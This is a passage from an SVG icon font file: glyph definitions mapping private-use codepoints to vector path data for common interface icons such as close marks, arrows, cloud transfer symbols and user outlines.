<glyph unicode="&#xe680;" d="M171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
<glyph unicode="&#xe681;" d="M105.211 374.789c-83.288-83.288-83.288-218.293 0-301.581s218.29-83.285 301.578 0.003c83.288 83.288 83.291 218.29 0.003 301.578s-218.293 83.288-301.581 0zM394.726 85.274c-76.491-76.491-200.961-76.494-277.452-0.003s-76.491 200.964 0 277.455c76.491 76.491 200.963 76.491 277.455 0 76.49-76.491 76.487-200.961-0.003-277.452zM171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
<glyph unicode="&#xe682;" d="M268.271 275.051l-12.071 12.071-96.565-96.566 12.069-12.069 84.496 84.495 84.096-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe683;" d="M255.608 10.736c117.862 0 213.386 95.523 213.386 213.386s-95.523 213.386-213.386 213.386-213.385-95.524-213.385-213.386 95.523-213.386 213.385-213.386zM255.608 420.437c108.243 0 196.315-88.070 196.315-196.315 0-108.243-88.072-196.315-196.315-196.315s-196.315 88.072-196.315 196.315c0 108.245 88.072 196.315 196.315 196.315zM267.795 275.051l-12.071 12.071-96.564-96.566 12.069-12.069 84.495 84.495 84.097-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe684;" d="M306.538 211.729l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe685;" d="M42.223 224.122c0-117.862 95.523-213.386 213.386-213.386s213.386 95.523 213.386 213.386-95.524 213.386-213.387 213.386-213.385-95.524-213.385-213.386zM451.923 224.122c0-108.243-88.070-196.315-196.315-196.315-108.243 0-196.315 88.072-196.315 196.315s88.072 196.315 196.315 196.315c108.245 0 196.315-88.072 196.315-196.315zM306.538 211.935l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe686;" d="M204.679 236.271l-12.071-12.071 96.567-96.565 12.069 12.069-84.496 84.496 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe687;" d="M468.994 224.122c0 117.862-95.523 213.386-213.386 213.386s-213.385-95.524-213.385-213.386 95.523-213.386 213.386-213.386 213.385 95.524 213.385 213.386zM59.293 224.122c0 108.243 88.070 196.315 196.315 196.315 108.243 0 196.315-88.072 196.315-196.315s-88.072-196.315-196.315-196.315c-108.244 0-196.315 88.072-196.315 196.315zM204.679 236.309l-12.071-12.071 96.567-96.565 12.069 12.070-84.496 84.495 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe688;" d="M243.729 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe689;" d="M255.608 437.508c-117.862 0-213.386-95.523-213.386-213.386s95.523-213.386 213.386-213.386 213.386 95.523 213.386 213.386-95.523 213.386-213.386 213.386zM255.608 27.807c-108.243 0-196.315 88.070-196.315 196.315 0 108.243 88.072 196.315 196.315 196.315s196.315-88.072 196.315-196.315c0-108.245-88.072-196.315-196.315-196.315zM243.421 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe68a;" d="M192.4 221.5l-12.1 12.1 76.4 76.4 76.4-76.4-12.1-12.1-55.8 55.8v-223.3h-17.1v223.3l-55.7-55.8zM419.1 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.3 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19 39.7 59.7 65.4 103.7 65.4 63.5 0 115.2-51.7 115.2-115.2 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.8v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8-0.1 51.9-41.9 93.9-93.6 94z" />
<glyph unicode="&#xe68b;" d="M320.8 74.2l12.1-12.1-76.4-76.4-76.4 76.4 12.1 12.1 55.8-55.8v223.3h17v-223.3l55.8 55.8zM418.8 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.2 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19.1 39.9 59.8 65.6 103.8 65.6 63.4-0.2 115.1-51.8 115.1-115.3 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.9v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8 0 51.8-41.9 93.8-93.6 93.9z" />
<glyph unicode="&#xe68c;" d="M268.548 307.922c-27.797 0-50.351-22.542-50.351-50.346 0-27.811 22.554-50.362 50.351-50.362 27.818 0 50.354 22.55 50.354 50.362 0 27.803-22.538 50.345-50.354 50.345zM268.548 224c-18.504 0-33.567 15.064-33.567 33.577 0 18.505 15.064 33.56 33.567 33.56 18.522 0 33.57-15.055 33.57-33.56 0-18.514-15.048-33.577-33.57-33.577zM67.136 383.452v-251.765h402.824v251.765h-402.824zM453.178 326.668v-178.198h-369.256v218.197h369.256v-39.998zM379.942 114.902h-329.589v234.98h-16.785v-251.765h402.825v16.786h-16.784zM346.373 81.332h-329.589v234.981h-16.784v-251.766h402.825v16.784h-16.786zM109.098 349.358h50.354v-16.784h-50.353v16.784zM109.098 182.039h50.354v-16.784h-50.353v16.784zM377.649 349.358h50.353v-16.784h-50.353v16.784zM377.649 182.039h50.353v-16.784h-50.353v16.784z" horiz-adv-x="470" />
<glyph unicode="&#xe68d;" d="M118.982-31.232v233.236l-101.787-101.731-11.867 11.875 107.804 107.736-113.13 113.036 11.867 11.875 107.115-107.037v241.476l138.684-138.611-120.8-120.74 116.704-116.618-134.586-134.496zM135.766 197.25v-187.98l94.067 93.994-94.067 93.986zM135.766 438.73v-196.217l98.165 98.109-98.166 98.108z" horiz-adv-x="258" />
<glyph unicode="&#xe68e;" d="M184.708 299.464h117.475l50.353 59.175-50.353 58.315h-117.476v33.63h-16.784v-33.63h-151.142v-117.49h151.142v-16.723h-117.573l-50.352-58.315 50.352-59.171h117.573v-167.844h16.784v167.844h151.043v117.486h-151.042v16.722zM33.569 316.249v83.921h260.928l35.93-41.608-35.995-42.313h-260.864zM318.967 265.957v-83.918h-260.846l-36.011 42.305 35.929 41.613 260.926-0zM50.23 383.452h83.922v-16.784h-83.922v16.784zM218.114 249.087h83.922v-16.785h-83.922v16.785z" horiz-adv-x="353" />
<glyph unicode="&#xe68f;" d="M268.567 282.745h117.476v-16.784h-117.476v16.784zM268.55 182.039h117.492v-16.784h-117.492v16.784zM268.55 232.393h83.792v-16.785h-83.792v16.785zM251.766 383.452v50.353h-67.138v-50.353h-184.628v-369.257h436.394v369.257h-184.627zM419.61 366.666v-33.568h-167.844v33.569h167.844zM201.412 417.020h33.57v-83.922h-33.57v83.922zM16.785 366.666h167.845v-33.568h-167.845v33.569zM16.785 30.979v285.334h402.825v-285.334h-402.825zM247.406 105.575c-12.113 5.046-40.716 14.981-58.435 20.209-1.508 0.474-1.736 0.558-1.736 6.851 0 5.18 2.129 10.408 4.21 14.834 2.244 4.812 4.934 12.89 5.884 20.144 2.689 3.13 6.343 9.277 8.72 21.005 2.049 10.327 1.097 14.088-0.279 17.628-0.148 0.37-0.296 0.729-0.41 1.098-0.524 2.428 0.196 15.012 1.968 24.786 1.212 6.696-0.311 20.952-9.54 32.743-5.82 7.452-16.964 16.6-37.341 17.87l-11.178-0.008c-20.014-1.262-31.177-10.413-36.995-17.862-9.228-11.792-10.767-26.048-9.555-32.743 1.787-9.774 2.49-22.358 1.984-24.736-0.097-0.42-0.263-0.779-0.408-1.149-1.361-3.541-2.328-7.301-0.264-17.628 2.344-11.728 6-17.874 8.704-21.005 0.933-7.254 3.623-15.334 5.884-20.144 1.654-3.516 2.442-8.303 2.442-15.065 0-6.293-0.246-6.37-1.656-6.82-18.308-5.409-47.468-15.94-58.334-20.694-8.622-3.697-10.72-10.334-10.72-16.318 0-1.673 0-4.293 0-7.245h16.785v7.248c0 0.269 0.016 0.476 0.032 0.639 0.147 0.082 0.344 0.18 0.624 0.293 10.326 4.524 38.928 14.834 56.696 20.079 13.357 4.245 13.357 16.784 13.357 22.817 0 9.293-1.279 16.358-4.031 22.228-1.688 3.582-3.754 9.93-4.428 15.137l-0.654 5.007-3.293 3.82c-0.508 0.574-3.066 3.902-4.951 13.326-1.278 6.358-0.82 7.54-0.558 8.228 0.442 1.082 0.82 2.163 1.163 3.688 1.476 6.786-0.475 23.73-1.85 31.282-0.459 2.475 0.197 11.677 6.245 19.419 5.31 6.794 13.506 10.634 24.357 11.412l10.064 0.008c11.048-0.786 19.341-4.625 24.653-11.424 6.065-7.738 6.704-16.94 6.262-19.403-1.377-7.548-3.328-24.486-1.869-31.313l0.146-0.652 0.18-0.64c0.231-0.73 0.476-1.442 0.838-2.377 0.279-0.697 0.736-1.87-0.524-8.209-1.903-9.433-4.476-12.793-4.986-13.375l-3.262-3.788-0.656-4.966c-0.689-5.22-2.752-11.603-4.426-15.178-2.72-5.753-5.82-13.459-5.82-21.996 0-6.033 0-18.589 13.769-22.948 16.768-4.952 44.879-14.654 56.564-19.541 1.77-0.754 2.41-1.686 2.593-2.033v-6.786h16.785c0 2.952 0 5.572 0 7.245-0 5.988-4.149 13.298-12.754 17.002z" horiz-adv-x="437" />
<glyph unicode="&#xe690;" d="M210.149 306.852h-16.786v-95.784l52.813-52.812 11.868 11.868-47.896 47.894zM439.13 324.875l-118.686 118.687-89.397-89.405c-9.458 1.983-19.244 3.049-29.291 3.049-78.66 0-142.667-63.999-142.667-142.664 0-10.033 1.082-19.832 3.048-29.291l-62.138-62.138 24.718-95.928 93.969-22.75 68.22 68.219c4.884-0.491 9.834-0.77 14.85-0.77 78.676 0 142.667 64 142.667 142.658 0 5.015-0.264 9.97-0.771 14.855l95.478 95.48zM320.445 419.824l94.952-94.949-75.463-75.456c-11.688 46.288-45.978 83.562-90.48 99.411l70.99 70.993zM113.474 22.957l-75.004 18.161-19.834 76.9 48.828 48.827c15.867-44.502 53.139-78.784 99.429-90.469l-53.422-53.418zM201.756 88.668c-69.4 0-125.882 56.459-125.882 125.875 0 69.412 56.483 125.877 125.882 125.877 69.415 0 125.883-56.466 125.883-125.877 0-69.416-56.467-125.875-125.882-125.875z" horiz-adv-x="439" />
<glyph unicode="&#xe691;" d="M50.434 253.398c0-88.061 71.382-159.444 159.434-159.444 88.089 0 159.468 71.382 159.468 159.444 0 88.076-71.379 159.458-159.468 159.458-88.050-0.002-159.434-71.38-159.434-159.458zM209.871 396.068c78.677 0 142.682-64.002 142.682-142.671 0-78.659-64.007-142.657-142.682-142.657-78.66 0-142.653 63.998-142.653 142.657 0.001 78.669 63.99 142.672 142.653 142.672zM304.94 66.204l8.079-16.324 15.048 7.442-22.818 46.074-15.046-7.458 7.277-14.67c-26.995-13.752-57.058-21.046-87.611-21.046-106.474 0-193.084 86.658-193.084 193.176 0 72.563 41.109 139.118 105.312 171.99l7.802-15.752 15.031 7.45-22.818 46.063-15.030-7.451 7.573-15.28c-69.891-35.692-114.654-108.082-114.654-187.022 0-112.959 89.642-205.32 201.494-209.747v-25.538c-38.75-1.507-74.841-13.457-105.46-33.257h35.109c24.030 10.752 50.632 16.784 78.628 16.784 27.506 0 54.139-5.966 78.447-16.784h35.258c-30.995 19.964-67.219 31.7-105.197 33.257v25.603c30.224 1.214 59.826 8.868 86.659 22.49z" horiz-adv-x="370" />
<glyph unicode="&#xe692;" d="M218.166 395.616l-122.983-98.038h-95.183v-75.878l-0.066-0.044 0.066-0.044v-75.091h95.674l122.49-96.126v96.125h0.032v151.060h-0.032v98.038h0.002zM201.414 163.303h-0.032v-78.399l-99.904 78.399h-84.692v117.491h84.266l100.329 79.98v-63.196l0.032-16.784v-117.49h0.001zM257.389 308.339c18.26-24.329 27.914-53.322 27.914-83.851 0-31.163-10.030-60.652-28.995-85.278l13.308-10.236c21.243 27.587 32.471 60.615 32.471 95.516 0 34.191-10.818 66.67-31.274 93.924l-13.425-10.074zM325 369.173l-12.948-10.686c31.536-38.188 48.91-86.553 48.91-136.192 0-49.050-16.144-95.19-46.666-133.425l13.13-10.474c32.913 41.24 50.32 90.995 50.32 143.899 0.002 53.529-18.733 105.692-52.745 146.88zM377.255 423.669l-12.59-11.088c46.289-52.566 71.776-120.163 71.776-190.346 0-68.76-24.601-135.332-69.267-187.438l12.736-10.916c47.289 55.139 73.318 125.588 73.318 198.356-0.002 74.267-26.98 145.806-75.974 201.433z" horiz-adv-x="454" />
<glyph unicode="&#xe693;" d="M0.001 128.040c0-7.344 0-29.12 0-33.922s2.852-13.014 13.146-13.014c7.9 0 71.006 0 99.918 0 8.754 0 14.406 0 14.406 0h2.476c0 0 1.656 0 4.328 0 0-7.736 0-14.786 0-17.483 0-5.94 3.524-16.088 16.276-16.088 9.786 0 88.15 0 123.93 0 10.834 0 17.85 0 17.85 0h3.065c0 0 6.884 0 17.555 0 35.666 0 114.149 0 123.951 0 12.735 0 16.274 10.147 16.274 16.088s0 32.874 0 41.961-3.212 19.161-16.274 24.776c-16.508 7.228-60.78 23.226-88.596 31.438-2.147 0.68-2.508 0.793-2.508 10.342 0 10.277 1.18 17.548 3.688 22.89 3.442 7.302 7.507 19.579 8.95 30.594 4.096 4.737 9.654 14.080 13.209 31.888 3.149 15.695 1.673 21.406-0.394 26.766-0.229 0.566-0.459 1.123-0.623 1.754-0.771 3.606 0.294 22.726 3 37.568 1.85 10.171-0.476 31.815-14.49 49.723-8.849 11.317-25.798 25.208-56.204 27.126l-16.964 0.016c-30.93-1.934-47.861-15.826-56.712-27.142-14.012-17.908-16.34-39.552-14.488-49.731 2.688-14.834 3.769-33.955 2.983-37.634-0.164-0.558-0.393-1.115-0.607-1.68-2.082-5.36-3.541-11.072-0.41-26.766 3.572-17.808 9.13-27.152 13.21-31.888 1.459-11.014 5.524-23.292 8.951-30.594 3.162-6.72 6.407-14.662 6.407-22.546 0-9.546-0.361-9.661-2.654-10.382-5.721-1.68-12.21-3.705-19.030-5.892-16.063 5.966-36.272 12.95-50.928 17.286-1.737 0.546-2.031 0.639-2.031 8.36 0 8.31 0.966 14.185 2.982 18.505 2.788 5.909 6.066 15.825 7.246 24.734 3.294 3.827 7.786 11.384 10.671 25.784 2.542 12.686 1.344 17.3-0.328 21.636-0.18 0.458-0.361 0.909-0.49 1.418-0.624 2.918 0.23 18.375 2.407 30.374 1.492 8.22-0.375 25.717-11.702 40.207-7.146 9.138-20.849 20.374-45.404 21.93h-13.701c-24.998-1.556-38.666-12.793-45.83-21.93-11.326-14.49-13.21-31.986-11.704-40.207 2.164-11.998 3.049-27.456 2.409-30.438-0.13-0.442-0.328-0.894-0.492-1.352-1.689-4.335-2.868-8.95-0.328-21.636 2.885-14.399 7.376-21.956 10.671-25.784 1.18-8.907 4.458-18.823 7.228-24.734 2.556-5.433 5.18-11.851 5.18-18.226 0-7.72-0.296-7.812-2.147-8.401-21.734-6.418-56.844-18.605-71.71-24.824-10.553-4.534-15.62-13.515-15.62-20.866zM151.061 105.584c0 2.491 2.49 7.515 9.18 10.384 17.653 7.375 60.892 22.284 87.167 30.038 14.685 4.613 14.685 17.252 14.685 26.479 0 11.18-4.048 21.286-8.014 29.692-2.738 5.86-6.263 16.4-7.49 25.653l-0.655 4.958-3.278 3.794c-1.804 2.094-6.345 8.654-9.459 24.234-2.426 12.17-1.359 14.94-0.409 17.387l0.017 0.024 0.146 0.414c0.347 0.861 0.656 1.726 0.904 2.582l0.18 0.606 0.131 0.623c1.72 8.024-0.524 31.114-2.884 44.133-1.066 5.86 0.279 22.439 11.194 36.396 9.72 12.416 24.52 19.378 44.028 20.702l15.882-0.016c23.882-1.639 36.848-12.134 43.536-20.68 10.932-13.961 12.26-30.536 11.194-36.376-2.31-12.688-4.589-36.166-2.901-44.084l0.082-0.356 0.098-0.357c0.346-1.356 0.786-2.574 1.277-3.786 0.87-2.258 1.952-5.065-0.474-17.214-3.115-15.592-7.654-22.124-9.459-24.206l-3.294-3.811-0.639-4.99c-1.229-9.26-4.736-19.767-7.507-25.618-3.606-7.697-5.279-17.236-5.279-30.046 0-9.212 0-21.832 14.209-26.34 27.078-7.998 71.039-23.858 86.938-30.817 4.736-2.032 6.229-4.31 6.229-9.4v-41.264h-285.25l-0.082 41.262zM16.785 128.040c0.032 0.654 1.066 3.557 5.459 5.44 14.392 6.024 49.058 18.014 69.842 24.152 14.178 4.508 14.178 17.022 14.178 24.497 0 9.652-3.426 18.241-6.786 25.373-2.18 4.663-4.868 12.981-5.77 19.792l-0.656 4.958-3.262 3.786c-1.016 1.173-4.492 5.946-6.933 18.129-1.786 8.917-1.066 10.765-0.492 12.252l0.098 0.221 0.066 0.221c0.344 0.869 0.573 1.558 0.77 2.234l0.197 0.62 0.13 0.63c1.656 7.736-0.722 28.209-2.311 36.945-0.737 4.106 0.344 16.538 8.424 26.881 7.245 9.252 18.391 14.465 33.142 15.481h12.604c18.030-1.274 27.75-9.106 32.734-15.486 8.064-10.326 9.162-22.779 8.424-26.874-1.689-9.228-3.901-29.458-2.328-36.872l0.082-0.347 0.082-0.346c0.314-1.18 0.689-2.246 1.099-3.307 0.574-1.471 1.294-3.356-0.476-12.256-2.442-12.186-5.917-16.944-6.934-18.112l-3.262-3.794-0.655-4.964c-0.918-6.844-3.607-15.147-5.803-19.801-3.113-6.671-4.572-14.808-4.572-25.642 0-7.485 0-20.014 13.751-24.368 8.686-2.572 19.506-6.128 30.192-9.849-17.654-6.048-34.487-12.18-44.208-16.243-13.081-5.614-19.341-16.719-19.341-25.808 0-1.894 0-4.598 0-7.695h-117.492v30.151z" horiz-adv-x="453" />
<glyph unicode="&#xe694;" d="M201.34 425.413c-111.246 0-201.412-90.183-201.412-201.413s90.166-201.412 201.412-201.412c111.23 0 201.411 90.182 201.411 201.412s-90.183 201.413-201.411 201.413zM90.864 76.152c12.326 4.534 25.848 9.106 37.88 13.147 41.093 13.81 47.419 15.93 47.419 29.791v32.413l-14.031 2.336c-1 0.173-24.636 4.072-40.518 4.072-8.195 0-12.85 0.204-17.343 3.154 11.556 25.292 23.505 64.86 28.029 96.162l0.869-0.298 1.246 22.181c1.968 35.54 31.356 63.38 66.924 63.38 35.552 0 64.941-27.84 66.924-63.38l1.459-22.1 0.639 0.217c4.524-31.302 16.473-70.87 28.029-96.162-4.474-2.95-9.146-3.154-17.325-3.154-16.112 0-38.944-5.080-41.484-5.663l-13.066-2.966v-30.192c0-13.71 6.556-16.031 49.238-31.11 11.064-3.918 23.438-8.302 34.913-12.647-30.634-22.578-68.45-35.962-109.327-35.962-41.387-0.002-79.644 13.685-110.475 36.779zM325.582 87.553c-34.24 13.548-82.281 28.438-82.281 31.538 0 3.846 0 16.792 0 16.792s23.078 5.244 37.764 5.244 25.178 0.918 37.766 16.652c-15.736 27.798-33.57 90.347-33.57 122.343l-0.245-0.082c-2.442 44.157-38.912 79.234-83.676 79.234s-81.234-35.077-83.692-79.234l-0.23 0.082c0-31.996-17.834-94.543-33.57-122.343 12.59-15.736 23.078-16.652 37.764-16.652s37.766-3.844 37.766-3.844 0-14.348 0-18.194c0-3.147-49.141-17.301-83.299-30.576-36.486 33.757-59.368 81.986-59.368 135.486 0 101.805 82.824 184.628 184.628 184.628s184.626-82.824 184.626-184.628c0.002-53.998-23.304-102.654-60.382-136.446z" horiz-adv-x="403" />
<glyph unicode="&#xe695;" d="M419.541 224c0 115.884-93.936 209.804-209.804 209.804s-209.804-93.92-209.804-209.804c0-115.868 93.936-209.804 209.805-209.804 115.867 0 209.804 93.937 209.804 209.804zM16.715 224c0 106.435 86.594 193.020 193.020 193.020 106.442 0 193.020-86.585 193.020-193.020s-86.578-193.020-193.020-193.020c-106.427 0-193.020 86.586-193.020 193.020zM299.934 236.736l11.868 11.868-102.065 102.058-102.052-102.058 11.87-11.868 81.791 81.799v-203.632h16.782v203.632z" horiz-adv-x="420" />
<glyph unicode="&#xe696;" d="M302.118 224c0 83.43-67.629 151.060-151.059 151.060s-151.060-67.628-151.060-151.060c0-83.43 67.629-151.060 151.060-151.060s151.059 67.63 151.059 151.060zM151.060 89.724c-74.038 0-134.274 60.238-134.274 134.276s60.237 134.275 134.274 134.275c74.038 0 134.274-60.237 134.274-134.275s-60.237-134.275-134.274-134.275zM352.471 375.060h-128.734c9.769-4.721 18.998-10.343 27.602-16.784h101.132c74.041 0 134.274-60.236 134.274-134.275s-60.236-134.275-134.274-134.275h-101.132c-8.606-6.442-17.834-12.063-27.602-16.784h128.734c83.43 0 151.060 67.63 151.060 151.060s-67.63 151.060-151.060 151.060z" horiz-adv-x="504" />
<glyph unicode="&#xe697;" d="M216.555 189.514l250.438-1.902-14.39 14.466c-1.067 1.067-106.788 104.5-248.242 5.35l-44.877 65.916c5.689 4.728 10.606 10.597 14.31 17.534 15.276 28.639 4.441 64.216-24.178 79.484-28.636 15.276-64.22 4.454-79.48-24.176-15.276-28.626-4.459-64.207 24.177-79.488 16.374-8.728 34.994-8.892 50.829-2.114l39.518-58.042-67.597 0.51c-2.228 18.406-13.064 35.46-30.651 44.841-28.636 15.272-64.204 4.446-79.48-24.19-15.277-28.618-4.458-64.202 24.177-79.479 28.619-15.26 64.22-4.442 79.48 24.178 3.082 5.755 5.032 11.786 6.066 17.866l78.464-0.591c-1.904-41.96 5.671-75.399 18.078-102.18h-28.57v-16.784h50.352v8.392h1.049c-0.361 0.606-0.689 1.279-1.049 1.902v6.49h-3.572c-10.802 21.021-18.358 46.993-19.653 79.226l53.958-79.226h-13.95v-16.784h50.354v16.784h-16.113l-69.448 102.019zM406.591 214.396c6.096-3.262 11.442-6.565 15.982-9.673l-189.201 1.452c75.792 44.124 137.373 27.332 173.219 8.221zM102.212 281.508c-20.406 10.891-28.16 36.362-17.276 56.77 10.884 20.414 36.355 28.168 56.778 17.276 20.406-10.884 28.16-36.356 17.26-56.774-10.884-20.416-36.355-28.16-56.761-17.272zM95.786 180.301c-10.884-20.406-36.355-28.144-56.778-17.26-20.407 10.882-28.16 36.354-17.276 56.762 10.9 20.419 36.355 28.168 56.779 17.276 20.407-10.887 28.159-36.356 17.276-56.779zM117.488 87.496h50.353v-16.784h-50.353v16.784zM318.9 87.496h50.353v-16.784h-50.353v16.784zM50.35 87.496h50.353v-16.784h-50.353v16.784zM386.038 87.496h50.351v-16.784h-50.351v16.784z" horiz-adv-x="467" />
<glyph unicode="&#xe698;" d="M209.804 299.529c-38.862 0-70.858-29.372-75.038-67.137h-17.276v-16.784h17.276c4.18-37.764 36.174-67.138 75.038-67.138 41.716 0 75.53 33.815 75.53 75.53s-33.814 75.53-75.53 75.53zM209.804 165.255c-29.536 0-53.975 21.93-58.072 50.353h58.072v16.785h-58.072c4.097 28.422 28.538 50.352 58.072 50.352 32.389 0 58.744-26.356 58.744-58.745s-26.356-58.745-58.745-58.745zM50.353 147.421v50.353h-16.784v-67.137h16.784zM50.353 265.961v50.353h-16.784v-67.137h16.784zM67.138 366.666v-285.336h285.334v285.336h-285.334zM335.688 98.118h-251.766v251.766h251.766v-251.766h0zM0.001 417.020v-386.041h419.608v386.041h-419.608zM402.825 47.764h-386.041v352.472h386.042v-352.472h-0.002z" horiz-adv-x="420" />
<glyph unicode="&#xe699;" d="M209.766 14.195c115.884 0 209.804 93.936 209.804 209.805s-93.921 209.804-209.804 209.804c-115.868 0-209.804-93.936-209.804-209.804s93.938-209.804 209.804-209.804zM209.766 417.020c106.427 0 193.022-86.594 193.022-193.020 0-106.435-86.594-193.020-193.020-193.020-106.442 0-193.020 86.586-193.020 193.020-0 106.427 86.576 193.020 193.019 193.020zM222.5 133.8l11.868-11.866 102.050 102.067-102.050 102.058-11.868-11.868 81.792-81.798h-203.626v-16.784h203.626z" horiz-adv-x="420" />
<glyph unicode="&#xe69a;" d="M300.87 184.695l-132.29-132.292-0.065 0.084c-0.492-0.51-0.904-1.067-1.41-1.558-34.356-34.354-90.264-34.354-124.621 0-33.355 33.356-34.224 86.957-2.819 121.49l17.654-17.637 27.88 27.865c37.421-17.849 83.544-11.392 114.541 19.603l47.487 47.472 11.867-11.868 11.868 11.868-47.486 47.468 71.217 71.211-11.868 11.867-71.219-71.21-47.469 47.476 71.202 71.211-11.85 11.875-71.22-71.219-47.466 47.476-11.868-11.867 11.868-11.868-47.486-47.476c-30.996-30.995-37.454-77.119-19.587-114.548l-27.881-27.869 17.948-17.964c-37.946-41.092-37.077-105.327 2.82-145.224 40.895-40.912 107.459-40.912 148.354 0l133.768 133.767c29.306 29.308 77.004 29.308 106.327 0l11.868 11.868c-35.863 35.851-94.216 35.851-130.064-0zM69.186 332.799l47.484 47.469 118.671-118.68-47.468-47.471c-32.718-32.718-85.956-32.718-118.688 0-32.717 32.719-32.717 85.957-0.001 118.682zM46.517 215.18c3.228-4.522 6.752-8.884 10.801-12.932 4.065-4.064 8.424-7.589 12.932-10.8l-12.932-12.932-23.734 23.735 12.934 12.93z" horiz-adv-x="431" />
<glyph unicode="&#xe69b;" d="M0 315.462l8.081-5.752c1.427-1.017 14.72-9.934 41.666-9.934 4.328 0 8.802 0.246 13.374 0.705 60.025-69.53 102.574-119.556 112.966-132.783-19.636-43.764-22.718-92.921-8.589-138.98l4.097-13.342 122.081 122.096 132.948-132.947 11.866 11.868-132.947 132.948 122.097 122.096-13.342 4.082c-45.272 13.882-95.772 10.75-138.98-8.59-13.195 10.375-63.072 52.795-132.472 112.706 1.754 10.704 3.688 34.93-9.196 55.058l-5.638 8.786-128.012-128.016zM27.668 319.38l96.511 96.526c6.162-17.948 1.442-37.109 1.376-37.339l-1.278-5.032 3.916-3.425c118.54-102.363 138.095-118.246 143.864-120.737l-0.034-0.097 3.115-0.934 2.967 1.393c36.11 17.261 78.447 22.046 117.49 13.375l-215.704-215.69c-8.802 39.519-4.197 80.726 13.391 117.474l1.672 3.491-1.571 3.541-0.492-0.212c-5.148 10.113-29.291 38.074-119.966 143.108l-2.966 3.442-4.508-0.607c-5.41-0.721-10.687-1.098-15.703-1.098-9.524-0.002-16.85 1.326-22.080 2.817z" horiz-adv-x="439" />
<glyph unicode="&#xe69c;" d="M33.574 385.55c20.948 20.947 48.796 32.486 78.431 32.486v0c29.633 0 57.483-11.539 78.43-32.486l224.558-224.572c29.913-29.914 29.913-78.612 0-108.526-14.49-14.506-33.767-22.486-54.272-22.486-20.504 0-39.78 7.982-54.268 22.486l-99.151 99.134 0.082 0.080-118.507 118.524c-8.047 8.032-12.474 18.736-12.474 30.094 0 11.375 4.426 22.062 12.474 30.11 8.032 8.031 18.718 12.474 30.094 12.474 11.375 0 22.063-4.442 30.095-12.474l189.938-189.922-11.868-11.868-189.94 189.922c-9.736 9.736-26.716 9.736-36.453 0-4.868-4.868-7.556-11.342-7.556-18.242 0-6.885 2.688-13.36 7.556-18.228l217.574-217.738c11.324-11.342 26.374-17.57 42.403-17.57 16.014 0 31.078 6.229 42.404 17.57 23.374 23.375 23.374 61.416 0 84.792l-224.555 224.572c-17.786 17.784-41.42 27.569-66.564 27.569-25.144 0-48.78-9.785-66.564-27.569s-27.586-41.42-27.586-66.564c0-25.144 9.802-48.796 27.586-66.582l196.823-196.821-11.868-11.868-196.822 196.825c-20.964 20.964-32.504 48.812-32.504 78.447s11.54 57.483 32.504 78.432z" horiz-adv-x="439" />
<glyph unicode="&#xe69d;" d="M100.707 253.373h201.413v-16.784h-201.412v16.784zM100.707 186.236h201.413v-16.784h-201.412v16.784zM100.707 119.090h134.274v-16.786h-134.274v16.786zM251.012 421.216c-4 23.804-24.654 41.962-49.599 41.962-24.939 0-45.593-18.158-49.598-41.962h-151.816v-436.394h402.824v436.394h-151.811zM167.845 382.685v30.139c0 18.51 15.063 33.57 33.57 33.57 18.514 0 33.57-15.060 33.57-33.57v-30.142l8.488-4.827c16.482-9.38 29.119-23.636 36.372-40.56h-156.845c7.251 16.928 19.889 31.18 36.372 40.56l8.474 4.832zM386.040 1.606h-369.256v402.825h134.275v-11.989c-26.201-14.916-45.19-41.064-50.352-71.932h201.412c-5.148 30.872-24.144 57.015-50.352 71.932v11.989h134.274v-402.825z" horiz-adv-x="403" />
